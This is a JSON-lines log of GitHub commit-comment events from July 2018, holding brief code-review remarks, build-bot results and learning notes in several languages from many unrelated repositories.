{"id":"8026659477","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853952,"position":20,"line":27,"path":"src/save_history.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:40:31Z","updated_at":"2018-07-27T05:40:31Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-27T05:40:31Z"}
{"id":"8026659637","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853953,"position":12,"line":19,"path":"src/save_history.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:40:35Z","updated_at":"2018-07-27T05:40:35Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-27T05:40:35Z"}
{"id":"8026659781","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853954,"position":4,"line":11,"path":"src/save_history.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:40:38Z","updated_at":"2018-07-27T05:40:38Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-27T05:40:38Z"}
{"id":"8026659830","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853955,"position":29,"line":26,"path":"order/serializers.py","commit_id":"bb5c0b8eec2a14cd94046359f74ea932df3cc3e2","created_at":"2018-07-27T05:40:39Z","updated_at":"2018-07-27T05:40:39Z","author_association":"NONE","body":"это лишнее присваивание. \r\nuser = User.objects.get(email=self.user.email)\r\nuser.balance -= price\r\nи т.д"}},"created_at":"2018-07-27T05:40:39Z"}
{"id":"8026662371","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853962,"position":31,"line":317,"path":"src/augmentation.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:41:38Z","updated_at":"2018-07-27T05:41:38Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-27T05:41:38Z"}
{"id":"8026662493","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853963,"position":12,"line":298,"path":"src/augmentation.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:41:41Z","updated_at":"2018-07-27T05:41:41Z","author_association":"MEMBER","body":"#Blame"}},"created_at":"2018-07-27T05:41:41Z"}
{"id":"8026662612","type":"CommitCommentEvent","actor":{"login":"rlhorwitz"},"repo":{"name":"rlhorwitz/firstproject"},"payload":{"comment":{"id":29853964,"position":null,"line":null,"path":null,"commit_id":"056e4be8fb68aff0c5709d8b0ee5a6dffd16580b","created_at":"2018-07-27T05:41:45Z","updated_at":"2018-07-27T05:41:45Z","author_association":"OWNER","body":"Our solution to Harvard's cs50 week 1 problem set \"credit card validation\" \r\n\r\nThis was a challenge, but I learned that I actually have good instincts when it comes to planning out my attack! \r\n\r\nWith this program, I learned about modulus, working with longs, and experienced my first hair-pulling. In addition, I also experienced the addiction that developers feel when they get fixated on solving a problem and simply cannot let it go, along with the thrill of finally solving it. \r\n\r\nI know it seems like I'm being dramatic...however, this is the second time I've ever coded anything in my life... so I'm proud of myself. \r\n\r\nMore to come. \r\n"}},"created_at":"2018-07-27T05:41:45Z"}
{"id":"8026662736","type":"CommitCommentEvent","actor":{"login":"juhlee"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29853966,"position":4,"line":290,"path":"src/augmentation.py","commit_id":"8b917e227e6aace11cc59802ccf9eacb1b21cc16","created_at":"2018-07-27T05:41:47Z","updated_at":"2018-07-27T05:41:47Z","author_association":"MEMBER","body":"#Blame 2"}},"created_at":"2018-07-27T05:41:47Z"}
{"id":"8026662904","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853968,"position":29,"line":26,"path":"order/serializers.py","commit_id":"bb5c0b8eec2a14cd94046359f74ea932df3cc3e2","created_at":"2018-07-27T05:41:51Z","updated_at":"2018-07-27T05:41:51Z","author_association":"NONE","body":"и вот тут почитай про django transaction atomic\r\nчтоб вычитагте и приюовление были атомарными"}},"created_at":"2018-07-27T05:41:51Z"}
{"id":"8026668892","type":"CommitCommentEvent","actor":{"login":"Usamaliaquat123"},"repo":{"name":"syedadeelalirizvi/safety-app"},"payload":{"comment":{"id":29853974,"position":null,"line":null,"path":null,"commit_id":"e9a73151f81a54f84af9f881b14dd283e6cd84f7","created_at":"2018-07-27T05:44:06Z","updated_at":"2018-07-27T05:44:06Z","author_association":"NONE","body":"Is this working right now  ?  if not try `\t\r\n  async openCameraProfile(): Promise<any>{\r\n      try{ this.base64ImageProfile = 'data:image/jpeg;base64,' + await this.camera.getPicture(this.options); \r\n           }catch(e){ console.log(e);}\r\n          }`  it worked for me ,....,\r\n`Warning`\r\nlast thing convert target :  `es6` to `es7` in `tsconfig.json`  👍  "}},"created_at":"2018-07-27T05:44:06Z"}
{"id":"8026669242","type":"CommitCommentEvent","actor":{"login":"pranayyy"},"repo":{"name":"pranayyy/project-pkm"},"payload":{"comment":{"id":29853975,"position":null,"line":null,"path":null,"commit_id":"43cc171b061f481a0d944eb4799ded2be0fa484b","created_at":"2018-07-27T05:44:14Z","updated_at":"2018-07-27T05:44:14Z","author_association":"OWNER","body":"key changed"}},"created_at":"2018-07-27T05:44:14Z"}
{"id":"8026670560","type":"CommitCommentEvent","actor":{"login":"bkueng"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29853976,"position":null,"line":null,"path":null,"commit_id":"9d691dc4299925019b9e94e2381cd85677f7456e","created_at":"2018-07-27T05:44:45Z","updated_at":"2018-07-27T05:44:45Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-27T05:44:45Z"}
{"id":"8026673587","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29853986,"position":32,"line":946,"path":"update.xml","commit_id":"e6d8e0d1bc3f271fdc9fbb0efab2058af4b6495b","created_at":"2018-07-27T05:45:51Z","updated_at":"2018-07-27T05:45:51Z","author_association":"MEMBER","body":"don't add unnecessary spaces"}},"created_at":"2018-07-27T05:45:51Z"}
{"id":"8026676601","type":"CommitCommentEvent","actor":{"login":"amreshkrsingh"},"repo":{"name":"amreshkrsingh/amreshkrsingh.github.io"},"payload":{"comment":{"id":29853992,"position":null,"line":null,"path":null,"commit_id":"a8917ae9f842a1981ae1c90ca3511db22587c9a5","created_at":"2018-07-27T05:47:00Z","updated_at":"2018-07-27T05:47:00Z","author_association":"OWNER","body":"![amresh-zuch574 csez zohocorpin com_8081_portal_ak13](https://user-images.githubusercontent.com/41761275/43303694-8566fd5c-918e-11e8-9803-be2fbf3e07c2.png)\r\n\r\n\r\nThis is test attachment."}},"created_at":"2018-07-27T05:47:00Z"}
{"id":"8026678473","type":"CommitCommentEvent","actor":{"login":"blogic"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853995,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T05:47:42Z","updated_at":"2018-07-27T05:47:42Z","author_association":"CONTRIBUTOR","body":"ok, then revert the L2 cache part of the patch"}},"created_at":"2018-07-27T05:47:42Z"}
{"id":"8026678490","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29853996,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T05:47:42Z","updated_at":"2018-07-27T05:47:42Z","author_association":"OWNER","body":"3. src/index.js - line 11 - we're going to have many many many reducers and in the store we want to combine all these reducers to create one root reducer which we're going to do later on. But for now because we only have one reducer let's just use the search robots reducer to create the store"}},"created_at":"2018-07-27T05:47:42Z"}
{"id":"8026679160","type":"CommitCommentEvent","actor":{"login":"sheisc"},"repo":{"name":"sheisc/ucc162.3"},"payload":{"comment":{"id":29853997,"position":null,"line":null,"path":null,"commit_id":"fbcd526bd7ef4582f72f2c19acf356434f68b0e0","created_at":"2018-07-27T05:47:59Z","updated_at":"2018-07-27T05:47:59Z","author_association":"OWNER","body":"GCC-Multilib might be needed on your system. \r\nOn 64-bit Ubuntu, it can be installed via the following command. Good Luck.\r\nsudo apt-get install gcc-multilib g++-multilib"}},"created_at":"2018-07-27T05:47:59Z"}
{"id":"8026683367","type":"CommitCommentEvent","actor":{"login":"zhuweiyou"},"repo":{"name":"mtdhb/api"},"payload":{"comment":{"id":29853999,"position":null,"line":null,"path":null,"commit_id":"9c946d455388d4031596189060dccc031becf332","created_at":"2018-07-27T05:49:36Z","updated_at":"2018-07-27T05:49:36Z","author_association":"MEMBER","body":"复制粘贴一把梭？"}},"created_at":"2018-07-27T05:49:36Z"}
{"id":"8026683540","type":"CommitCommentEvent","actor":{"login":"grarvind"},"repo":{"name":"grarvind/ansible"},"payload":{"comment":{"id":29854000,"position":null,"line":null,"path":null,"commit_id":"0c3772350c6a214ae2e00f419d3e82e7c72bb3db","created_at":"2018-07-27T05:49:39Z","updated_at":"2018-07-27T05:49:39Z","author_association":"OWNER","body":"#40219"}},"created_at":"2018-07-27T05:49:39Z"}
{"id":"8026683913","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_device_motorola_potter"},"payload":{"comment":{"id":29854001,"position":null,"line":null,"path":null,"commit_id":"fd6d99e205047eae40ce193ed6cce5bb3d8685ec","created_at":"2018-07-27T05:49:47Z","updated_at":"2018-07-27T05:49:47Z","author_association":"MEMBER","body":"there is no need to define remote \r\nremote crdroid that is set, always picks up github.com \r\nhowever defining branch is an option to look for indeed"}},"created_at":"2018-07-27T05:49:47Z"}
{"id":"8026684179","type":"CommitCommentEvent","actor":{"login":"AlexValerock"},"repo":{"name":"eddieurbina/RutaGarnacha"},"payload":{"comment":{"id":29854002,"position":null,"line":null,"path":null,"commit_id":"4370bf69dc0ec34c71c5cb774cc9d84c451f9c0c","created_at":"2018-07-27T05:49:53Z","updated_at":"2018-07-27T05:49:53Z","author_association":"COLLABORATOR","body":":)"}},"created_at":"2018-07-27T05:49:53Z"}
{"id":"8026686096","type":"CommitCommentEvent","actor":{"login":"swelljoe"},"repo":{"name":"webmin/usermin"},"payload":{"comment":{"id":29854008,"position":null,"line":null,"path":null,"commit_id":"a31632b637bf7c8dd6f4d36413d51d064779e62a","created_at":"2018-07-27T05:50:34Z","updated_at":"2018-07-27T05:50:34Z","author_association":"COLLABORATOR","body":"I'm not sure. Qmail+LDAP was it's own specific feature (supporting a fork of Qmail), but I thought Jamie removed it as it was unmaintained, so I'm not sure if that's the same thing."}},"created_at":"2018-07-27T05:50:34Z"}
{"id":"8026687940","type":"CommitCommentEvent","actor":{"login":"khadarjan"},"repo":{"name":"khadarjan/jio"},"payload":{"comment":{"id":29854011,"position":null,"line":null,"path":null,"commit_id":"7d436b42854b8b82041a6780e57c16cb02c1e30d","created_at":"2018-07-27T05:51:15Z","updated_at":"2018-07-27T05:51:15Z","author_association":"OWNER","body":"### jio works### \r\n**basic structs**\r\n_need some implemntatoins_\r\n\r\n> desin users numbers\r\n\r\n> check balences`all \r\n\r\n- [times](wwww.jubhdsr.com\r\n\r\n# #1. \r\n\r\n) \r\n\r\n- numbers`"}},"created_at":"2018-07-27T05:51:15Z"}
{"id":"8026689854","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29854014,"position":null,"line":null,"path":null,"commit_id":"5fee20655acba9328b9aba665075d191db7afe1d","created_at":"2018-07-27T05:51:59Z","updated_at":"2018-07-27T05:51:59Z","author_association":"OWNER","body":"this was made in hurry so it is just a \"prototype\" \r\nwhat I want to do is scan only item slot that changed and PLAYER_EQUIPMENT_CHANGED(event, slotId, hasItem) has such functionality or I will just use Ovale_EquipmentChanged and scan through all items items or just 3 slots ( head, shoulders, chest ) difference in performance should be minimal.\r\n\r\nI only saw 3 events tied to azerite items \r\nAZERITE_EMPOWERED_ITEM_SELECTION_UPDATED: azeriteEmpoweredItemLocation\r\nRESPEC_AZERITE_EMPOWERED_ITEM_CLOSED\r\nRESPEC_AZERITE_EMPOWERED_ITEM_OPENED\r\n\r\nI believe that AZERITE_EMPOWERED_ITEM_SELECTION_UPDATED fire when you select trait in azerite item but I will have to check it when beta servers are up\r\n\r\nI didn't use importsimc script yet so unfortunately I can't help you in that \r\n\r\n"}},"created_at":"2018-07-27T05:51:59Z"}
{"id":"8026699336","type":"CommitCommentEvent","actor":{"login":"Cosaquee"},"repo":{"name":"AstroMatt/book-devops"},"payload":{"comment":{"id":29854031,"position":181,"line":121,"path":"book/issue-tracker/jira.rst","commit_id":"23b8a712dfdae3421257e0cb28d0ad7ef717a12d","created_at":"2018-07-27T05:55:24Z","updated_at":"2018-07-27T05:55:24Z","author_association":"COLLABORATOR","body":"should?"}},"created_at":"2018-07-27T05:55:24Z"}
{"id":"8026700107","type":"CommitCommentEvent","actor":{"login":"Cosaquee"},"repo":{"name":"AstroMatt/book-devops"},"payload":{"comment":{"id":29854032,"position":235,"line":170,"path":"book/issue-tracker/jira.rst","commit_id":"23b8a712dfdae3421257e0cb28d0ad7ef717a12d","created_at":"2018-07-27T05:55:40Z","updated_at":"2018-07-27T05:55:40Z","author_association":"COLLABORATOR","body":"Tworzenie?"}},"created_at":"2018-07-27T05:55:40Z"}
{"id":"8026700182","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29854034,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T05:55:41Z","updated_at":"2018-07-27T05:55:41Z","author_association":"OWNER","body":"4. src/index.js - line 13 - 17 - Now we don't really want to pass down the store all the way down our component tree to the smaller components over and over again. react redux gives us a nice component that we can use to do this very easily. We can simply wrap our app component in this provider component."}},"created_at":"2018-07-27T05:55:41Z"}
{"id":"8026702713","type":"CommitCommentEvent","actor":{"login":"Usamaliaquat123"},"repo":{"name":"syedadeelalirizvi/safety-app"},"payload":{"comment":{"id":29854041,"position":null,"line":null,"path":null,"commit_id":"9406a1e007b817b2b4bd11645851cfbea3354636","created_at":"2018-07-27T05:56:36Z","updated_at":"2018-07-27T05:56:36Z","author_association":"NONE","body":"I can't pull bunch of requests because `tsconfig` is little bit different and another is i used `@firebase/app` to getting the initial `access_token` . Even user is delete a `state `of app the user is logged in ... 👍 \r\n*  I'm using only 1 module for registering @components . So the performance its great of this apk..\r\n* I saw your daily commits so i change my code according to your code. 🥇 "}},"created_at":"2018-07-27T05:56:36Z"}
{"id":"8026707594","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854050,"position":24,"line":45,"path":"lesson4/route.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T05:58:17Z","updated_at":"2018-07-27T05:58:17Z","author_association":"NONE","body":"будет даже правильней `true` унести из метода `validate!` в метод `valid?`, поместив после строки с вызовом `validate!`"}},"created_at":"2018-07-27T05:58:17Z"}
{"id":"8026708326","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854052,"position":11,"line":14,"path":"lesson4/route.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T05:58:33Z","updated_at":"2018-07-27T05:58:33Z","author_association":"NONE","body":"этот метод абсолютно идентичный для всех классов\r\nчто можно сделать?"}},"created_at":"2018-07-27T05:58:33Z"}
{"id":"8026709431","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29854054,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T05:58:58Z","updated_at":"2018-07-27T05:58:58Z","author_association":"OWNER","body":"We've created the provider component that passes down the store and the store uses the reducer or whatever reducers that we have to create the store and create that object tree of our state."}},"created_at":"2018-07-27T05:58:58Z"}
{"id":"8026713252","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29854072,"position":null,"line":null,"path":null,"commit_id":"0433255b367b8a81b1742a50901fdd4cf65e7263","created_at":"2018-07-27T06:00:20Z","updated_at":"2018-07-27T06:00:20Z","author_association":"NONE","body":"The complete pawn eval is stored in an eval cache which is accessed by the pawn_key. That means you can use only pawns in your calculations else we have different position which would be use the same index and  an eval of a wrong position can be returned."}},"created_at":"2018-07-27T06:00:20Z"}
{"id":"8026715310","type":"CommitCommentEvent","actor":{"login":"KakuFull"},"repo":{"name":"KakuFull/test"},"payload":{"comment":{"id":29854080,"position":1,"line":1,"path":"pom.xml","commit_id":"c6870576e9a697adef9b5a2fe1247707150bd9a6","created_at":"2018-07-27T06:01:02Z","updated_at":"2018-07-27T06:01:02Z","author_association":"OWNER","body":"\"・技術面\r\n　　TERASOLUNA Frameworkのアーキテクチャと使い方を理解し、内容を説明できるようになる。\r\n　　画面テストの概要、Seleniumのアーキテクチャと使い方を理解し、内容を説明できるようになる。\r\n・業務面\r\n　　先輩の仕事の仕方を観察し、自分の仕事に取り入れて、仕事のスタイルを確立させる。\"\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\"・OJT上の計画（年間計画）\r\n　① SpringMVCのアーキテクチャ概要を理解する。\r\n　　　Model , View , Controllerとは何か、リクエストを受けてからレスポンスを返すまでの流れは\r\n　　　どうなっているかなど仕組みについて勉強する。\r\n　② 敬語・マナーを身に付け、OJT報告の際に指摘されないようになる。\r\n・業務上の計画\r\n　③ TERASOLUNA Frameworkの創作課題の指摘点を修正し、理解する。\r\n　④ 業務知識を確認するため、翌月の1週目を使ってSeleniumの概要について学習する。Selenium入門サイトを\r\n　　　参考にテストケースを実行して、Seleniumが何をやっているのかを理解し説明できるようになる。\r\n　⑤ Selenium2からSelenium3への移行業務を実施しながら、まずSelenium2とSelenium3の変更点を理解する。\"\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\"・OJT上の計画（年間計画）\r\n　① Spring Frameworkの参考書を使い、SpringMVCを用いたアプリケーションを作って勉強した。\r\n　　　Model, View, Controllerの使い方と用途、処理の流れについて理解することが出来た。\r\n　　　しかし、SpringMVCのアーキテクチャ概要について理解できていない。\r\n　② 毎日の日報報告をする際に、河野さんに言葉遣いを確認してもらい、正しい言葉遣いになるようにした。\r\n・業務上の計画\r\n　③ まだ創作課題の発表をしていないため、修正を行っていない。\r\n　　　7月30日に発表を行う予定である。\r\n　④ 業務都合により、Selenium入門サイトを使ってテストを実行する時間がなかったため、\r\n　　　Selenium業務で取り掛かるソースコードを実行し、テスト流れを確認した。\r\n　⑤ Selenium2からSelenium3の変更点について、現在の業務に関わっている部分について理解した。\r\n　　　業務で取り扱っていない部分に関してはまだ理解しきれていない。\"\t\t"}},"created_at":"2018-07-27T06:01:02Z"}
{"id":"8026716399","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29854083,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T06:01:25Z","updated_at":"2018-07-27T06:01:25Z","author_association":"OWNER","body":"- the Redux store is like a brain: it’s in charge for orchestrating all the moving parts in Redux\r\n- the state of the application lives as a single, immutable object within the store\r\n- as soon as the store receives an action it triggers a reducer\r\n- the reducer returns the next state"}},"created_at":"2018-07-27T06:01:25Z"}
{"id":"8026717539","type":"CommitCommentEvent","actor":{"login":"NightVales"},"repo":{"name":"NightVales/test"},"payload":{"comment":{"id":29854087,"position":3,"line":3,"path":"1.txt","commit_id":"c16e4d2da4e6b9579fa89ba744f2edc0ddd4480b","created_at":"2018-07-27T06:01:50Z","updated_at":"2018-07-27T06:01:50Z","author_association":"OWNER","body":"d=c"}},"created_at":"2018-07-27T06:01:50Z"}
{"id":"8026720384","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29854088,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T06:02:49Z","updated_at":"2018-07-27T06:02:49Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T06:02:49Z"}
{"id":"8026720588","type":"CommitCommentEvent","actor":{"login":"ZhongHaoHero666"},"repo":{"name":"chenyy0708/KT"},"payload":{"comment":{"id":29854089,"position":null,"line":null,"path":null,"commit_id":"7ed57f05d7a59b35211013018976c86d4a07402a","created_at":"2018-07-27T06:02:55Z","updated_at":"2018-07-27T06:02:55Z","author_association":"NONE","body":"这个commit应该@我，以显示我的贡献"}},"created_at":"2018-07-27T06:02:55Z"}
{"id":"8026722693","type":"CommitCommentEvent","actor":{"login":"jonghyeok34"},"repo":{"name":"JanghoPark24/WebProject"},"payload":{"comment":{"id":29854091,"position":4,"line":15,"path":"WebProject/src/main/webapp/WEB-INF/tiles/tiles.xml","commit_id":"be50f6f580b553b3e9bf3cb56cd55ebea97e79ec","created_at":"2018-07-27T06:03:43Z","updated_at":"2018-07-27T06:03:43Z","author_association":"COLLABORATOR","body":"모두 찾기 tile.xml( */* 형태로 바꾸기)"}},"created_at":"2018-07-27T06:03:43Z"}
{"id":"8026727637","type":"CommitCommentEvent","actor":{"login":"jannes-m"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29854117,"position":null,"line":null,"path":null,"commit_id":"63d544c4003120d5fd707351fe0e04455d614dff","created_at":"2018-07-27T06:05:27Z","updated_at":"2018-07-27T06:05:27Z","author_association":"COLLABORATOR","body":"can't say I like but due to the lack of a better idea... I have adjusted the caption of Fig. 13.1 accordingly"}},"created_at":"2018-07-27T06:05:27Z"}
{"id":"8026737570","type":"CommitCommentEvent","actor":{"login":"canndrew"},"repo":{"name":"canndrew/netsim"},"payload":{"comment":{"id":29854223,"position":4,"line":20,"path":"src/util/ipv6_addr.rs","commit_id":"ddf94cba3def73a3f819067ab937dc05bdf01e9b","created_at":"2018-07-27T06:08:58Z","updated_at":"2018-07-27T06:08:58Z","author_association":"OWNER","body":"Thanks :)"}},"created_at":"2018-07-27T06:08:58Z"}
{"id":"8026739379","type":"CommitCommentEvent","actor":{"login":"jIdle"},"repo":{"name":"jIdle/CS333"},"payload":{"comment":{"id":29854225,"position":208,"line":417,"path":"xv6/proc.c","commit_id":"b43add85e6fcb8be5b51ad643b474f9936e3e274","created_at":"2018-07-27T06:09:36Z","updated_at":"2018-07-27T06:09:36Z","author_association":"OWNER","body":"This loop is giving me the most trouble right now. The issue has something to do with either:\r\n\r\n1. Init is being allowed into the list and it's doing weird stuff because my loop doesn't allow it in.\r\n2. The loop allows for the loop variable to be edited inside the loop. Probably not the problem."}},"created_at":"2018-07-27T06:09:36Z"}
{"id":"8026739753","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854227,"position":26,"line":162,"path":"lesson4/rail_road.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T06:09:45Z","updated_at":"2018-07-27T06:09:45Z","author_association":"NONE","body":"здесь какие-то суровые сложности с отступами ))\r\nрекомендуемый формат отступов для этого метода выглядит примерно так:\r\n```ruby\r\n  def create_train\r\n    puts \"Введите 1, если поезд грузовой \\n Введите 2, если поезд пассажирский\"\r\n    type = gets.to_i\r\n    begin\r\n      puts \"Введите номер поезда\"\r\n      number = gets.chomp.to_s\r\n      train = if type == 1\r\n                CargoTrain.new(number)\r\n              elsif type == 2\r\n                PassengerTrain.new(number)\r\n              end\r\n      puts \"Поезд #{number} создан\"\r\n      @trains.push(train)\r\n    rescue => e\r\n      puts e.message\r\n      retry\r\n    end\r\n  end\r\n```"}},"created_at":"2018-07-27T06:09:45Z"}
{"id":"8026740401","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29854230,"position":11,"line":21,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java","commit_id":"f987af8eafced461f40997785d1735976131165f","created_at":"2018-07-27T06:09:58Z","updated_at":"2018-07-27T06:09:58Z","author_association":"OWNER","body":"@songy23 - Thank you for the info! I made the changes you suggested and was able to get it working after the inclusion of `@SuppressWarnings(\"PrivateConstructorForUtilityClass\")` in Style.java. I'm unsure if this is best practice, but it finally passed the build. Your thoughts?\r\nI can now sort though the 4 ZpageHandlers and unify the classes & IDs for use w/CSS. Down to the wire!!!"}},"created_at":"2018-07-27T06:09:58Z"}
{"id":"8026742042","type":"CommitCommentEvent","actor":{"login":"ikoamu"},"repo":{"name":"ikoamu/Zaseki"},"payload":{"comment":{"id":29854234,"position":null,"line":null,"path":null,"commit_id":"6040cfcf19aaee65ef72608b53afac1a884623a4","created_at":"2018-07-27T06:10:32Z","updated_at":"2018-07-27T06:10:32Z","author_association":"OWNER","body":"POSTとPUTのテストについて質問です。\r\nどちらも`repository.save(member)`を呼び出されているのか\r\n`verify()`したところ、エラーになります。\r\n\r\nこれはテストの書き方がいけないのでしょうか\r\nそれともControllerの方の書き方がよくないのでしょうか"}},"created_at":"2018-07-27T06:10:32Z"}
{"id":"8026742322","type":"CommitCommentEvent","actor":{"login":"jaasmaz"},"repo":{"name":"mikesmobile/website"},"payload":{"comment":{"id":29854237,"position":null,"line":null,"path":null,"commit_id":"120859b77618062317b4a7fc455bbdf298afca40","created_at":"2018-07-27T06:10:38Z","updated_at":"2018-07-27T06:10:38Z","author_association":"COLLABORATOR","body":"I forgot to mention that I cleaned the commented lines in navigation.component.html"}},"created_at":"2018-07-27T06:10:38Z"}
{"id":"8026744764","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854242,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-27T06:11:27Z","updated_at":"2018-07-27T06:11:27Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T06:11:27Z"}
{"id":"8026748548","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29854253,"position":26,"line":162,"path":"lesson4/rail_road.rb","commit_id":"cbfeb12748339b64e590efdccb6693e8c79d1f2b","created_at":"2018-07-27T06:12:43Z","updated_at":"2018-07-27T06:12:43Z","author_association":"NONE","body":"обрати внимание: \"рескью\" и \"бегин - энд\" должны быть на одном уровне, аналогично \"иф - элсиф - энд\""}},"created_at":"2018-07-27T06:12:43Z"}
{"id":"8026751106","type":"CommitCommentEvent","actor":{"login":"tlugosan"},"repo":{"name":"UWPCE-PythonCert-ClassRepos/Self_Paced-Online"},"payload":{"comment":{"id":29854257,"position":null,"line":null,"path":null,"commit_id":"bd88fc6f00dfd16323fcd11c039329a60cac0f89","created_at":"2018-07-27T06:13:37Z","updated_at":"2018-07-27T06:13:37Z","author_association":"CONTRIBUTOR","body":"Grid exercises with test code included"}},"created_at":"2018-07-27T06:13:37Z"}
{"id":"8026754450","type":"CommitCommentEvent","actor":{"login":"ryosasakawa"},"repo":{"name":"LinkedOpenData/challenge2018"},"payload":{"comment":{"id":29854260,"position":null,"line":null,"path":null,"commit_id":"c16e02259b4be691813f1b1b338ee41f3fc66ba4","created_at":"2018-07-27T06:14:43Z","updated_at":"2018-07-27T06:14:43Z","author_association":"COLLABORATOR","body":"LODCサイトのトップページの「ミートアップ参加者募集中」の記述を削除"}},"created_at":"2018-07-27T06:14:43Z"}
